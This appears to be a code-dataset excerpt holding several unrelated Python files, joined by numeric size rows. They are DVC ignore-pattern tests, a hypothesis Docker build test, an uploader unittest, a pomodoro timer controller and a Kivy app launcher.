# otherwise the pattern can match both files and directories.
# For example, a pattern doc/frotz/ matches doc/frotz directory,
# but not a/doc/frotz directory;
def test_ignore_sub_directory(tmp_dir, dvc):
    """A pattern containing a path separator ('doc/fortz') is anchored to
    the ignore file's directory: it matches dir/doc/fortz but not
    dir/a/doc/fortz."""
    tmp_dir.gen(
        {
            "dir": {
                "doc": {"fortz": {"b": "b"}},
                "a": {"doc": {"fortz": {"a": "a"}}},
            }
        }
    )
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "doc/fortz"}})
    dvc.tree.__dict__.pop("dvcignore", None)
    root = PathInfo(tmp_dir)
    survivors = set(dvc.tree.walk_files(root / "dir"))
    assert survivors == {
        root / "dir" / "a" / "doc" / "fortz" / "a",
        root / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }
# However, a pattern without a path separator (e.g. "frotz/") matches both
# "frotz" and "a/frotz" when they are directories.
def test_ignore_directory(tmp_dir, dvc):
    """A bare pattern ('fortz') matches that directory at any depth, so
    both dir/fortz and dir/a/fortz are ignored."""
    tmp_dir.gen({"dir": {"fortz": {}, "a": {"fortz": {}}}})
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "fortz"}})
    dvc.tree.__dict__.pop("dvcignore", None)
    root = PathInfo(tmp_dir)
    survivors = set(dvc.tree.walk_files(root / "dir"))
    assert survivors == {
        root / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }
def test_multi_ignore_file(tmp_dir, dvc):
    """A nested .dvcignore can re-include a file excluded by an outer one.

    (Removed the ``monkeypatch`` fixture — it was requested but never used.)
    """
    tmp_dir.gen({"dir": {"subdir": {"should_ignore": "1", "not_ignore": "1"}}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/subdir/*_ignore")
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "!subdir/not_ignore"}})
    dvc.tree.__dict__.pop("dvcignore", None)
    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / "dir" / "subdir" / "not_ignore",
        path / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }
def test_pattern_trie_tree(tmp_dir, dvc):
    """The pattern trie merges patterns along the directory hierarchy:
    a lookup for any path returns its own patterns plus all ancestors',
    with nested patterns rewritten relative to the topmost ignore file."""
    tmp_dir.gen(
        {
            "top": {
                "first": {
                    DvcIgnore.DVCIGNORE_FILE: "a\nb\nc",
                    "middle": {
                        "second": {
                            DvcIgnore.DVCIGNORE_FILE: "d\ne\nf",
                            "bottom": {},
                        }
                    },
                },
            },
            "other": {DvcIgnore.DVCIGNORE_FILE: "1\n2\n3"},
        }
    )
    # Drop the cached dvcignore so the generated files are re-read.
    dvc.tree.__dict__.pop("dvcignore", None)
    ignore_pattern_trie = None
    for ignore in dvc.tree.dvcignore.ignores:
        if isinstance(ignore, DvcIgnorePatternsTrie):
            ignore_pattern_trie = ignore
            break
    assert ignore_pattern_trie is not None
    ignore_pattern_top = ignore_pattern_trie[os.fspath(tmp_dir / "top")]
    ignore_pattern_other = ignore_pattern_trie[os.fspath(tmp_dir / "other")]
    ignore_pattern_first = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first")
    ]
    ignore_pattern_middle = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle")
    ]
    ignore_pattern_second = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle" / "second")
    ]
    ignore_pattern_bottom = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle" / "second" / "bottom")
    ]
    # "top" has no ignore file of its own: its entry is falsy (empty),
    # yet still compares equal to an empty DvcIgnorePatterns.
    assert not ignore_pattern_top
    assert (
        DvcIgnorePatterns([], os.fspath(tmp_dir / "top")) == ignore_pattern_top
    )
    assert (
        DvcIgnorePatterns(["1", "2", "3"], os.fspath(tmp_dir / "other"))
        == ignore_pattern_other
    )
    assert (
        DvcIgnorePatterns(
            ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
        )
        == ignore_pattern_first
    )
    # "middle" has no ignore file; it inherits "first"'s patterns verbatim.
    assert (
        DvcIgnorePatterns(
            ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
        )
        == ignore_pattern_middle
    )
    # "second"'s own patterns are merged in, rewritten relative to "first"
    # (anchored "/middle/second/**/<pat>").
    assert (
        DvcIgnorePatterns(
            [
                "a",
                "b",
                "c",
                "/middle/second/**/d",
                "/middle/second/**/e",
                "/middle/second/**/f",
            ],
            os.fspath(tmp_dir / "top" / "first"),
        )
        == ignore_pattern_second
    )
    # "bottom" adds nothing: same merged set as its parent "second".
    assert (
        DvcIgnorePatterns(
            [
                "a",
                "b",
                "c",
                "/middle/second/**/d",
                "/middle/second/**/e",
                "/middle/second/**/f",
            ],
            os.fspath(tmp_dir / "top" / "first"),
        )
        == ignore_pattern_bottom
    )
def test_ignore_in_added_dir(tmp_dir, dvc):
    """Ignored files inside an added directory are excluded from the cache,
    so they disappear after a checkout."""
    tmp_dir.gen(
        {
            "dir": {
                "sub": {
                    "ignored": {"content": "ignored content"},
                    "not_ignored": "not ignored content",
                }
            },
            ".dvcignore": "**/ignored",
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)
    ignored_path = tmp_dir / "dir" / "sub" / "ignored"
    # Invisible to DVC's tree, but still present on disk.
    assert not dvc.tree.exists(PathInfo(ignored_path))
    assert ignored_path.exists()
    dvc.add("dir")
    # Remove it from the workspace; checkout restores only cached content,
    # so the ignored dir must NOT come back.
    shutil.rmtree(ignored_path)
    dvc.checkout()
    assert not ignored_path.exists()
| 12,254 | 4,497 |
from subprocess import call
from tempfile import NamedTemporaryFile
from hypothesis import settings, note
from hypothesis.stateful import RuleBasedStateMachine, rule
from hypothesis.strategies import sampled_from
def versions():
    """Generate only the minor Python versions available on Docker Hub."""
    # TODO: treat as sem-ver version to allow accurate ordering (exercise left to the reader)
    return sampled_from([f"3.{minor}" for minor in range(5, 9)])
class TestPythonVersions(RuleBasedStateMachine):
    """Property-based check that demoapp.py builds and runs on every
    supported Python minor version. Requires Docker and network access;
    the build context is the current working directory, so demoapp.py
    must exist there."""

    @rule(version=versions())
    def try_build_image(self, version):
        # Write a throwaway Dockerfile; NamedTemporaryFile cleans it up.
        with NamedTemporaryFile() as tmp:
            print(f"building in Python version {version} ({tmp.name})")
            contents = f"""FROM python:{version}-alpine
COPY demoapp.py .
RUN python demoapp.py
"""
            tmp.write(contents.encode())
            # Flush so `docker build -f` sees the full file contents.
            tmp.flush()
            # note() output is shown by hypothesis only for failing examples.
            note(f'Program does not run on Python {version}')
            exit_code = call(f'docker build -f {tmp.name} .'.split(' '))
            assert exit_code == 0
# Disable hypothesis' per-example deadline: docker builds take far longer
# than the default time limit.
TestPythonVersions.TestCase.settings = settings(deadline=None)
# Expose the state machine's unittest TestCase so test runners collect it.
test_python_versions = TestPythonVersions.TestCase
| 1,128 | 328 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
import uploader
class UploaderTest(unittest.TestCase):
    """Tests for uploader.Uploader bundle-upload dispatch."""

    def setUp(self):
        super().setUp()
        self.mock_client = mock.MagicMock()
        self.mock_bundle = mock.MagicMock()
        # Patch _upload_resource so no real upload happens; the fixed
        # return value '123' stands in for the server-assigned id.
        self._upload_resource = mock.patch.object(
            uploader.Uploader, '_upload_resource', return_value='123').start()
        # .start() without a matching .stop() leaks the patch into other
        # tests; stop all active patches when each test finishes.
        self.addCleanup(mock.patch.stopall)

    def test_upload_bundle(self):
        """An OpenMRS bundle is uploaded and its patient gets the new id."""
        self.mock_bundle.openmrs_patient = mock.MagicMock()
        upload_handler = uploader.Uploader(self.mock_client)
        upload_handler.upload_openmrs_bundle(self.mock_bundle)
        self.assertTrue(self._upload_resource.called)
        self.assertEqual(self.mock_bundle.openmrs_patient.base.new_id, '123')

    def test_upload_bundle_gcp(self):
        """A bundle with no patient triggers no resource upload."""
        self.mock_bundle.patient = None
        upload_handler = uploader.Uploader(self.mock_client)
        upload_handler.upload_bundle(self.mock_bundle)
        self.assertFalse(self._upload_resource.called)
| 1,479 | 472 |
from __future__ import annotations
from enum import Enum
from typing import List
import os.path as path
import stargazing.data.database as database
import stargazing.audio.audio_controller as audio_ac
import stargazing.audio.audio_player as audio_ap
import stargazing.pomodoro.timer as pomo_t
import stargazing.project.project_controller as proj_pc
from stargazing.utils.format_funcs import format_pomodoro_time
# Alarm audio clips live in <package>/res/, one level above this module.
ALARM_START_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_start.mp3"
ALARM_FINISH_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_finish.mp3"
class PomodoroIntervalSettings():
    """Interval settings for the pomodoro timer.

    @param work_secs: Number of seconds for the work interval of the timer.
    @param break_secs: Number of seconds for the break interval of the timer."""

    def __init__(self, work_secs: int, break_secs: int) -> None:
        self.work_secs = work_secs
        self.break_secs = break_secs

    @property
    def name(self) -> str:
        """Human-readable label, e.g. "40m + 10m"."""
        return f"{format_pomodoro_time(self.work_secs, False)} + {format_pomodoro_time(self.break_secs, False)}"

    def __eq__(self, o: object) -> bool:
        # Returning NotImplemented for foreign types lets Python fall back
        # to its default comparison instead of raising AttributeError
        # (the previous version crashed on e.g. `settings == None`).
        if not isinstance(o, PomodoroIntervalSettings):
            return NotImplemented
        return self.work_secs == o.work_secs and self.break_secs == o.break_secs

    def __ne__(self, o: object) -> bool:
        result = self.__eq__(o)
        if result is NotImplemented:
            return result
        return not result
class PomodoroStatus(Enum):
    """Lifecycle states of the pomodoro timer; values are display strings."""

    INACTIVE = "inactive"
    WORK = "work"
    BREAK = "break"
    PAUSED_WORK = "paused work"
    PAUSED_BREAK = "paused break"
    FINISHED_WORK = "finished work"
    FINISHED_BREAK = "finished break"
class PomodoroController():
    """Pomodoro manager, containing current pomodoro timer, status, autostart option and interval settings.

    @param project_controller: Instance of a project controller.
    @param audio_controller: Instance of an audio controller.
    @param interval_time: Optional interval settings; defaults to 2400s work / 600s break.
    @param last_autostart: Initial value of the autostart option."""

    def __init__(self, project_controller: proj_pc.ProjectController, audio_controller: audio_ac.AudioController,
                 interval_time: PomodoroIntervalSettings = None, last_autostart=True) -> None:
        self.project_controller = project_controller
        self.audio_controller = audio_controller
        # Default: 40 minutes work + 10 minutes break.
        self.interval_settings = interval_time if interval_time else PomodoroIntervalSettings(
            2400, 600)
        self.autostart_setting = last_autostart
        # The timer always starts configured for a work interval.
        self.timer = pomo_t.Timer(self.interval_settings.work_secs)
        self.status = PomodoroStatus.INACTIVE

    def finish_timer(self, disable_sound=False) -> None:
        """End the current interval: persist finished work to the database,
        swap in the next interval's timer, optionally play an alarm, and
        autostart the next interval if configured."""
        if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
            # Record the completed work interval before replacing the timer.
            database.insert_pomodoro(
                self.project_controller.current, self.timer)
            self.timer = pomo_t.Timer(self.interval_settings.break_secs)
            if not disable_sound:
                self.__play_alarm_sound(ALARM_FINISH_PATH)
            if self.autostart_setting:
                self.timer.start()
                self.status = PomodoroStatus.BREAK
            else:
                self.status = PomodoroStatus.FINISHED_WORK
        elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK):
            self.timer = pomo_t.Timer(self.interval_settings.work_secs)
            if self.autostart_setting:
                self.timer.start()
                self.status = PomodoroStatus.WORK
                if not disable_sound:
                    self.__play_alarm_sound(ALARM_START_PATH)
            else:
                self.status = PomodoroStatus.FINISHED_BREAK

    def reset_timer(self) -> None:
        """Restart the current interval from the beginning, persisting any
        work already done on a work interval."""
        if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK, PomodoroStatus.FINISHED_WORK):
            database.insert_pomodoro(
                self.project_controller.current, self.timer)
            self.timer = pomo_t.Timer(self.interval_settings.work_secs)
            self.timer.start()
            self.status = PomodoroStatus.WORK
        elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK, PomodoroStatus.FINISHED_BREAK):
            self.timer = pomo_t.Timer(self.interval_settings.break_secs)
            self.timer.start()
            self.status = PomodoroStatus.BREAK

    def update_timer(self) -> None:
        """Tick the timer; credit elapsed time to the current project while
        working, and finish the interval when the timer completes."""
        time_diff, timer_complete = self.timer.update()
        if self.status == PomodoroStatus.WORK:
            self.project_controller.add_todays_total_time(time_diff)
            self.project_controller.current.add_time(time_diff, True)
        if timer_complete:
            self.finish_timer()

    def toggle_start_stop(self) -> None:
        """Start, pause or resume the timer depending on the current status."""
        if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
            self.timer.start()
            self.status = PomodoroStatus.WORK
            self.__play_alarm_sound(ALARM_START_PATH)
        elif self.status == PomodoroStatus.PAUSED_WORK:
            self.timer.continue_()
            self.status = PomodoroStatus.WORK
        elif self.status == PomodoroStatus.FINISHED_WORK:
            self.timer.start()
            self.status = PomodoroStatus.BREAK
        elif self.status == PomodoroStatus.PAUSED_BREAK:
            self.timer.continue_()
            self.status = PomodoroStatus.BREAK
        elif self.status == PomodoroStatus.WORK:
            self.timer.pause()
            self.status = PomodoroStatus.PAUSED_WORK
        elif self.status == PomodoroStatus.BREAK:
            self.timer.pause()
            self.status = PomodoroStatus.PAUSED_BREAK

    def set_interval_settings(self, interval_settings: PomodoroIntervalSettings) -> None:
        """Adopt new interval settings, retargeting the running timer."""
        self.interval_settings = interval_settings
        # Edit current timer settings without resetting
        if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
            self.timer.interval = interval_settings.work_secs
        else:
            self.timer.interval = interval_settings.break_secs

    def __play_alarm_sound(self, path) -> None:
        """Lower the background audio and play the alarm clip at *path*.

        NOTE(review): the parameter shadows the module-level ``path``
        (os.path) alias — harmless here, but worth renaming."""
        curr_vol = self.audio_controller.get_volume()
        audio_decr = 15
        self.audio_controller.set_volume(max(curr_vol - audio_decr, 0))
        alarm = audio_ap.AudioPlayer(path)
        alarm.set_volume(curr_vol)
        alarm.play()
        # TODO: this needs to be async - wait for the alarm length
        self.audio_controller.set_volume(curr_vol)

    @property
    def timer_display(self) -> str:
        """Text for the UI timer button, derived from the current status."""
        if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
            return "START TIMER"
        elif self.status == PomodoroStatus.WORK:
            return f"BREAK IN {self.timer.remaining_time}"
        elif self.status == PomodoroStatus.BREAK:
            return f"POMODORO IN {self.timer.remaining_time}"
        elif self.status == PomodoroStatus.PAUSED_WORK:
            return f"PAUSED [WORK {self.timer.remaining_time}]"
        elif self.status == PomodoroStatus.PAUSED_BREAK:
            return f"PAUSED [BREAK {self.timer.remaining_time}]"
        elif self.status == PomodoroStatus.FINISHED_WORK:
            return "START BREAK"
| 7,033 | 2,251 |
from logging import root
from os import name
from kivy.animation import Animation
from kivy.clock import Clock
from kivy.lang import Builder
from widgets.loader import Loader
from kivy.uix.behaviors import button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.image import Image
from kivymd.app import MDApp
from kivy.uix.screenmanager import Screen, ScreenManager
from kivy.uix.button import Button
from screens.splash import SplashScreen
class MainApp(MDApp):
    """Application entry point: shows a splash screen, then loads the main
    UI from gui.kv after a short delay."""

    def __init__(self, **kwargs):
        # Set window title/icon before the base class initialises.
        self.title = "Vitual Music"
        self.icon = 'assets/icons/app_icon.jpeg'
        super().__init__(**kwargs)

    def build(self):
        """Build and return the root widget (a ScreenManager holding the
        splash screen)."""
        self.theme_cls.theme_style = "Dark"
        self.theme_cls.primary_palette = "Purple"
        # Swap to the main screen once the kv file has been loaded.
        Clock.schedule_once(self.load_file, 5)
        self.manager = ScreenManager()
        splash_scr = SplashScreen(name="splash")
        self.manager.add_widget(splash_scr)
        self.root = self.manager
        # Kivy expects build() to *return* the root widget; relying solely
        # on assigning self.root is not the documented contract.
        return self.manager

    def load_file(self, *args):
        """Load the main UI from gui.kv and switch to it."""
        a_pp = Builder.load_file("gui.kv")
        main_scr = Screen(name="main")
        main_scr.add_widget(a_pp)
        self.root.add_widget(main_scr)
        self.root.current = "main"
class Root(BoxLayout):
    """Placeholder layout with no Python-side behaviour.

    NOTE(review): presumably instantiated from gui.kv — confirm."""
    pass
if __name__ == "__main__":
    MainApp().run()

# NOTE(review): removed a stray module-level string literal that was a
# no-op expression; preserved here as a comment (looks like an RGBA value):
# 0.5,0.1,1,1
| 1,324 | 456 |